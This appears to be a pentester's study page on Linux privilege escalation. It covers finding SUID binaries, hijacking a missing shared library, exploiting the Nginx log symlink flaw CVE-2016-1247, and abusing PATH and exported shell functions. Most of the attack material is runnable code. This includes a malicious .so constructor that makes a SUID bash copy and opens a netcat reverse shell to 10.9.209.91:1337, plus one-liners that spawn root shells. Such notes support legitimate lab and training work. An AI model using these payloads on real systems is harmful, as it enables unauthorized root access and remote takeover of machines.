Suid
<figure<img src="/files/7rsthw7veufURip3tl6S" alt=""<figcaption</figcaption</figure
SUID
Overview
<figure><img src="/files/7rsthw7veufURip3tl6S" alt=""><figcaption></figcaption></figure>{% hint style="info" %} 4 bits for READ, 2 bits for WRITE and 1 bit for EXECUTE. chmod 777 would be rwx across the board {% endhint %}
Files with SUID (Set User ID) permissions allows the file to ran with permissions of another specified user
<figure><img src="/files/o6USTsO7A5WyZcdzv7Ib" alt=""><figcaption></figcaption></figure>Escalation via SUID
01find / -perm -u=s -type f 2>/dev/nullNote down any interesting binaries and run them to see what they do
The strace debugging tool can be used to monitor and trace/track what a binary does when its ran.
01strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"{% hint style="info" %} We want to find output that says "No such file or directory". We can then overwrite the file path/file with something malicious that will give us a root shell. {% endhint %}
<figure><img src="/files/B6llNZiCeGcFKQErMTpR" alt=""><figcaption></figcaption></figure>Check to see if the file path is writeable and create malicious .so file
01#include <stdio.h>02#include <sys/types.h>03 04static void inject() __attribute__((constructor));05void inject() {06 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/nc 10.9.209.91 1337 -e '/tmp/bash -p'");07}01gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.cThen run the original binary file
Escalation via Binary Symlinks
{% embed url="https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" %}
This has to do with a vulnerability Nginx and utilizing SUID to escalate to root.
Because of the way that the logs are being created by Nginx and how their permissions are set, we can leveraged this to go from a www-data user to root.
01linux-exploit-suggester.sh02[+] [CVE-2016-1247] nginxed-root.shManually find it with dpkg. Any version <= 1.6.2 is vulnerable
$dpkg -l | grep nginxNext find out if there is a SUID bit on /usr/bin/sudo
$find / -type f -perm -04000 -ls 2>/dev/nullNow we can create a Symlink between one of the Nginx log files and a malicious file so when it runs it runs as root
{% hint style="info" %} We need a startup/restart of the Nginx server for the malicious file to run {% endhint %}
Run the nginxed-root.sh tool and wait for Nginx to restart
Escalation via Environmental Variables
Environmental variables are variables that are available system wide and are inherited spawned by all child processes and shells
Check what the environmental variables on the machine are
01envFind a binary with the SUID bit
01find / -type f -perm -04000 -ls 2>/dev/nullRead the strings of binary files
01strings /usr/local/bin/suid-envWhile digging through the files you may come across the program trying to run another binary just by its name without using the full path. It can only do this because of the /usr/local/bin environment variable set in the shell.
<figure><img src="/files/gdYzpuC0YoCPElJ2tf1n" alt=""><figcaption></figcaption></figure>We can exploit this by changing the env binary path of service and replacing it with a malicious service binary file
Spawn root shell binary file as a one liner
$echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.cCompile
$gcc /tmp/service.c -o /tmp/serviceChange the $PATH variable and call the orginal binary
01export PATH=/tmp:$PATH02/usr/local/bin/suid-envALTERNATIVE
In the case that the binary is calling a full path a function with the name service can be made with that spawns a new shell
$function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }export the function ( the -f means refer to shell function)
$export -f /usr/sbin/serviceRun the original binary
$export -f /usr/sbin/service